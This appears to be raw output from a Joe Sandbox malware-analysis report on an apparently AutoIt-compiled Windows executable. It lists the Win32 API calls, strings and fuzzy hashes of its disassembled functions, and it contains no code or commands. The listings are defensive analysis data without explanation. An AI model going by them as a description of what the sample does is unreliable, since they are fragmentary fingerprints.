                    • String ID:
                    • API String ID: 3495660284-0
                    • Opcode ID: b2287fcaf78864bcc1438e5d35659059b90c92500f9ea794541e417b9ed38128
                    • Instruction ID: 9b589914cef7b14a4eaf5c4605eedd387f9558e7fd3312fb22ebedaedc30eb1f
                    • Opcode Fuzzy Hash: b2287fcaf78864bcc1438e5d35659059b90c92500f9ea794541e417b9ed38128
                    • Instruction Fuzzy Hash: F6F05E3A145712EBDB216B64FC8C9EF7B2AFF45302B004631F202918B4CF795801CB94
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 006D8E7F
                    • UnloadUserProfile.USERENV(?,?), ref: 006D8E8B
                    • CloseHandle.KERNEL32(?), ref: 006D8E94
                    • CloseHandle.KERNEL32(?), ref: 006D8E9C
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 006D8EA5
                    • HeapFree.KERNEL32(00000000), ref: 006D8EAC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                    • String ID:
                    • API String ID: 146765662-0
                    • Opcode ID: 35a66ecedadf9979473009ec44c4057da6329210ac2d8012ebd463426dbc7b36
                    • Instruction ID: cb5e44ab73feb09edc4e15807da365f1642668ad0181d57fbc1b7ebc7d7b9cc7
                    • Opcode Fuzzy Hash: 35a66ecedadf9979473009ec44c4057da6329210ac2d8012ebd463426dbc7b36
                    • Instruction Fuzzy Hash: 4AE0C236004205FBDA115FE1EC0C90ABF79FB89722B508330F21981870CF3A9860DB98
                    APIs
                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00712C7C,?), ref: 006D7C32
                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00712C7C,?), ref: 006D7C4A
                    • CLSIDFromProgID.OLE32(?,?,00000000,0070FB80,000000FF,?,00000000,00000800,00000000,?,00712C7C,?), ref: 006D7C6F
                    • _memcmp.LIBCMT ref: 006D7C90
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: FromProg$FreeTask_memcmp
                    • String ID: ,,q
                    • API String ID: 314563124-3492105362
                    • Opcode ID: af6e4e9f9b38a6308e8148c5ae0cd475ac81e3e9ea66f88adf71f590b9eba2ed
                    • Instruction ID: de1b7096b1064102490efc5903cdf6a29e8bf03512eff4209704a27217435fbc
                    • Opcode Fuzzy Hash: af6e4e9f9b38a6308e8148c5ae0cd475ac81e3e9ea66f88adf71f590b9eba2ed
                    • Instruction Fuzzy Hash: 05810A75E00109EFCB04DF94C984DEEB7BAFF89315F244199E506AB250EB71AE06CB61
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 006F8928
                    • CharUpperBuffW.USER32(?,?), ref: 006F8A37
                    • VariantClear.OLEAUT32(?), ref: 006F8BAF
                      • Part of subcall function 006E7804: VariantInit.OLEAUT32(00000000), ref: 006E7844
                      • Part of subcall function 006E7804: VariantCopy.OLEAUT32(00000000,?), ref: 006E784D
                      • Part of subcall function 006E7804: VariantClear.OLEAUT32(00000000), ref: 006E7859
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                    • API String ID: 4237274167-1221869570
                    • Opcode ID: 1fad4973766dc354ce3775f46d79b895c2f96d9469b330968baa08adaa2082f9
                    • Instruction ID: 6de1385af06a35ba1375ea01f27ad90ce23111ae37aaf1f695d6c0147c4949ad
                    • Opcode Fuzzy Hash: 1fad4973766dc354ce3775f46d79b895c2f96d9469b330968baa08adaa2082f9
                    • Instruction Fuzzy Hash: 3C919175604305DFC750EF28C48596BBBE6EF89714F04896EF9868B361DB30D906CB52
                    APIs
                      • Part of subcall function 0069FEC6: _wcscpy.LIBCMT ref: 0069FEE9
                    • _memset.LIBCMT ref: 006E3077
                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006E30A6
                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006E3159
                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 006E3187
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                    • String ID: 0
                    • API String ID: 4152858687-4108050209
                    • Opcode ID: d3c4fe173dfd3831460277ebb558f7647688c4450b9753cb838e8dc6f06937d4
                    • Instruction ID: 2285c43f743c401a38f35bbfae7a55d3df51d85e112968c691673d1c92d50bf4
                    • Opcode Fuzzy Hash: d3c4fe173dfd3831460277ebb558f7647688c4450b9753cb838e8dc6f06937d4
                    • Instruction Fuzzy Hash: 3A51263160A3A09FD724AF25C8486EBB7EAEF56350F040A2DF891D7391DB70CE448B56
                    APIs
                    • _memset.LIBCMT ref: 006E2CAF
                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 006E2CCB
                    • DeleteMenu.USER32(?,00000007,00000000), ref: 006E2D11
                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00746890,00000000), ref: 006E2D5A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Menu$Delete$InfoItem_memset
                    • String ID: 0
                    • API String ID: 1173514356-4108050209
                    • Opcode ID: 9200a15d721904429828bf14a565415a3d5d1c798ec361284d58cbd65aef79bd
                    • Instruction ID: c204ca93b69680fd15b1f73b1b2e33ecd53d668f9abdfdcec34c74db77ad9761
                    • Opcode Fuzzy Hash: 9200a15d721904429828bf14a565415a3d5d1c798ec361284d58cbd65aef79bd
                    • Instruction Fuzzy Hash: E241DE302063829FD724DF25CC54B5ABBEBEF85320F14461DFA6187291DB70E905CBA6
                    APIs
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                      • Part of subcall function 006DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006DB0E7
                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 006D93F6
                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 006D9409
                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 006D9439
                      • Part of subcall function 00687D2C: _memmove.LIBCMT ref: 00687D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$_memmove$ClassName
                    • String ID: ComboBox$ListBox
                    • API String ID: 365058703-1403004172
                    • Opcode ID: c54ac738a9be74b41254bc3c8f9203f5fe5d4dfa6fca2ddfd4ff8711a2fd6a68
                    • Instruction ID: 79b4f3b63724118f4ade85801e4ea00abb73f05c8bc25ba76d46a1f208b33c3e
                    • Opcode Fuzzy Hash: c54ac738a9be74b41254bc3c8f9203f5fe5d4dfa6fca2ddfd4ff8711a2fd6a68
                    • Instruction Fuzzy Hash: 9921E471D00104AEDB14AB74CC858FFB7BADF05760B10421EF925973E1DB395E4A9664
                    APIs
                      • Part of subcall function 00681D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00681D73
                      • Part of subcall function 00681D35: GetStockObject.GDI32(00000011), ref: 00681D87
                      • Part of subcall function 00681D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00681D91
                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007066D0
                    • LoadLibraryW.KERNEL32(?), ref: 007066D7
                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007066EC
                    • DestroyWindow.USER32(?), ref: 007066F4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                    • String ID: SysAnimate32
                    • API String ID: 4146253029-1011021900
                    • Opcode ID: 2b5fb991c57286a0f6561d830240267107be477bef766ca2a78304bd811feb5a
                    • Instruction ID: 2746dc453fcf41c1d2f98a8de9219498529b77efb01d95e32d94d622e2b524d6
                    • Opcode Fuzzy Hash: 2b5fb991c57286a0f6561d830240267107be477bef766ca2a78304bd811feb5a
                    • Instruction Fuzzy Hash: 0421BB71200206EBEF104F64ECA0EBB37EDEB19328F104329F910921E0DB7A8C619760
                    APIs
                    • GetStdHandle.KERNEL32(0000000C), ref: 006E705E
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006E7091
                    • GetStdHandle.KERNEL32(0000000C), ref: 006E70A3
                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 006E70DD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: b95613ef1409f46b5702c3b35268898880e33e68af9004fb98b4aea776ef8043
                    • Instruction ID: 7a563b15a5fe6b7296bb9b37ae007f2091e1c2881e308f37859c97e099b6f8fe
                    • Opcode Fuzzy Hash: b95613ef1409f46b5702c3b35268898880e33e68af9004fb98b4aea776ef8043
                    • Instruction Fuzzy Hash: B62181B4505349ABDB209F3ADC05A9A77A9BF54720F208619FCA0D72D0EBB099408B64
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 006E712B
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006E715D
                    • GetStdHandle.KERNEL32(000000F6), ref: 006E716E
                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006E71A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: 465b24989b3f74f9dbd6012259add08c8ce9695e0d6782540f524b4d30ff425b
                    • Instruction ID: 07220338cab655d435f40f535da049bcffea691c93deeae4573e1584e99d9a56
                    • Opcode Fuzzy Hash: 465b24989b3f74f9dbd6012259add08c8ce9695e0d6782540f524b4d30ff425b
                    • Instruction Fuzzy Hash: 4721A175505385ABDB209F6ADC08ADAB7AAAF55730F244719FCA0D33D0EB7098418B54
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 006EAEBF
                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 006EAF13
                    • __swprintf.LIBCMT ref: 006EAF2C
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0070F910), ref: 006EAF6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ErrorMode$InformationVolume__swprintf
                    • String ID: %lu
                    • API String ID: 3164766367-685833217
                    • Opcode ID: 150448f2e70f02f4d209ce46cc9130edd1e352e4bec138fe7e96921a6afbec09
                    • Instruction ID: 1a917c16a0ecc87688f0c9eedca569c72e48fc7025a5a526ee5842c27568039b
                    • Opcode Fuzzy Hash: 150448f2e70f02f4d209ce46cc9130edd1e352e4bec138fe7e96921a6afbec09
                    • Instruction Fuzzy Hash: A521A174A00208AFCB10EF65CC85DEE7BB9EF89704B044169F909EB351DB71EA41CB65
                    APIs
                      • Part of subcall function 00687D2C: _memmove.LIBCMT ref: 00687D66
                      • Part of subcall function 006DA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 006DA399
                      • Part of subcall function 006DA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 006DA3AC
                      • Part of subcall function 006DA37C: GetCurrentThreadId.KERNEL32 ref: 006DA3B3
                      • Part of subcall function 006DA37C: AttachThreadInput.USER32(00000000), ref: 006DA3BA
                    • GetFocus.USER32 ref: 006DA554
                      • Part of subcall function 006DA3C5: GetParent.USER32(?), ref: 006DA3D3
                    • GetClassNameW.USER32(?,?,00000100), ref: 006DA59D
                    • EnumChildWindows.USER32(?,006DA615), ref: 006DA5C5
                    • __swprintf.LIBCMT ref: 006DA5DF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                    • String ID: %s%d
                    • API String ID: 1941087503-1110647743
                    • Opcode ID: b7ba49464353c10308c23cf40211083c63b06a04a4d5797cf57e0e61c7fbf0ab
                    • Instruction ID: 37865ff0095a8803ac532b8dcefef5a463ee70aa081b81fac7e54734dc90e6c3
                    • Opcode Fuzzy Hash: b7ba49464353c10308c23cf40211083c63b06a04a4d5797cf57e0e61c7fbf0ab
                    • Instruction Fuzzy Hash: 3011B771A04204FBDF507FA4DC85FEA777A9F48700F04417AF9089A252CA7499458B79
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 006E2048
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                    • API String ID: 3964851224-769500911
                    • Opcode ID: 198d917d636fa053e480d3660142a3488b3b9c5792556b00dad62386139223f5
                    • Instruction ID: 6af19026b2aa906545ce341b391dec78e11749e9c6212effa4957fedd4bdd3f4
                    • Opcode Fuzzy Hash: 198d917d636fa053e480d3660142a3488b3b9c5792556b00dad62386139223f5
                    • Instruction Fuzzy Hash: 9E113C7190020A9FDF40EFA4D8914EEB7B6BF56304F1085A8D89567392DB325D16CB50
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 006FEF1B
                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 006FEF4B
                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 006FF07E
                    • CloseHandle.KERNEL32(?), ref: 006FF0FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                    • String ID:
                    • API String ID: 2364364464-0
                    • Opcode ID: 9053f269d65826dc2915a67d30303778df13f390b84cb6b70f6d4a9f227dcebc
                    • Instruction ID: 4763f9a01ada55a405bc94087876765af23991542bada31ec7eb46346d6f8d01
                    • Opcode Fuzzy Hash: 9053f269d65826dc2915a67d30303778df13f390b84cb6b70f6d4a9f227dcebc
                    • Instruction Fuzzy Hash: 448183716043009FD760EF24C886F7AB7E6AF48720F04891DF69ADB392DB71AC018B55
                    APIs
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                      • Part of subcall function 007010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00700038,?,?), ref: 007010BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00700388
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007003C7
                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0070040E
                    • RegCloseKey.ADVAPI32(?,?), ref: 0070043A
                    • RegCloseKey.ADVAPI32(00000000), ref: 00700447
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                    • API String ID: 3440857362-0
                    APIs
                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006EE88A
                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 006EE8B3
                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 006EE8F2
                      • Part of subcall function 00689997: __itow.LIBCMT ref: 006899C2
                      • Part of subcall function 00689997: __swprintf.LIBCMT ref: 00689A0C
                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 006EE917
                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 006EE91F
                    Similarity
                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                    • API String ID: 1389676194-0
                    APIs
                    • GetCursorPos.USER32(?), ref: 00682357
                    • ScreenToClient.USER32(007467B0,?), ref: 00682374
                    • GetAsyncKeyState.USER32(00000001), ref: 00682399
                    • GetAsyncKeyState.USER32(00000002), ref: 006823A7
                    Similarity
                    • API ID: AsyncState$ClientCursorScreen
                    • API String ID: 4210589936-0
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006D695D
                    • TranslateAcceleratorW.USER32(?,?,?), ref: 006D69A9
                    • TranslateMessage.USER32(?), ref: 006D69D2
                    • DispatchMessageW.USER32(?), ref: 006D69DC
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006D69EB
                    Similarity
                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                    • API String ID: 2108273632-0
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 006D8F12
                    • PostMessageW.USER32(?,00000201,00000001), ref: 006D8FBC
                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 006D8FC4
                    • PostMessageW.USER32(?,00000202,00000000), ref: 006D8FD2
                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 006D8FDA
                    Similarity
                    • API ID: MessagePostSleep$RectWindow
                    • API String ID: 3382505437-0
                    APIs
                    • IsWindowVisible.USER32(?), ref: 006DB6C7
                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 006DB6E4
                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 006DB71C
                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 006DB742
                    • _wcsstr.LIBCMT ref: 006DB74C
                    Similarity
                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                    • API String ID: 3902887630-0
                    APIs
                      • Part of subcall function 00682612: GetWindowLongW.USER32(?,000000EB), ref: 00682623
                    • GetWindowLongW.USER32(?,000000F0), ref: 0070B44C
                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0070B471
                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0070B489
                    • GetSystemMetrics.USER32(00000004), ref: 0070B4B2
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,006F1184,00000000), ref: 0070B4D0
                    Similarity
                    • API ID: Window$Long$MetricsSystem
                    • API String ID: 2294984445-0
                    APIs
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006D9802
                      • Part of subcall function 00687D2C: _memmove.LIBCMT ref: 00687D66
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006D9834
                    • __itow.LIBCMT ref: 006D984C
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006D9874
                    • __itow.LIBCMT ref: 006D9885
                    Similarity
                    • API ID: MessageSend$__itow$_memmove
                    • API String ID: 2983881199-0
                    APIs
                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0068134D
                    • SelectObject.GDI32(?,00000000), ref: 0068135C
                    • BeginPath.GDI32(?), ref: 00681373
                    • SelectObject.GDI32(?,00000000), ref: 0068139C
                    Similarity
                    • API ID: ObjectSelect$BeginCreatePath
                    • API String ID: 3225163088-0
                    APIs
                    Similarity
                    • API ID: _memcmp
                    • API String ID: 2931989736-0
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 006E4D5C
                    • __beginthreadex.LIBCMT ref: 006E4D7A
                    • MessageBoxW.USER32(?,?,?,?), ref: 006E4D8F
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 006E4DA5
                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006E4DAC
                    Similarity
                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                    • API String ID: 3824534824-0
                    APIs
                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006D8766
                    • GetLastError.KERNEL32(?,006D822A,?,?,?), ref: 006D8770
                    • GetProcessHeap.KERNEL32(00000008,?,?,006D822A,?,?,?), ref: 006D877F
                    • HeapAlloc.KERNEL32(00000000,?,006D822A,?,?,?), ref: 006D8786
                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006D879D
                    Similarity
                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                    • API String ID: 842720411-0
                    APIs
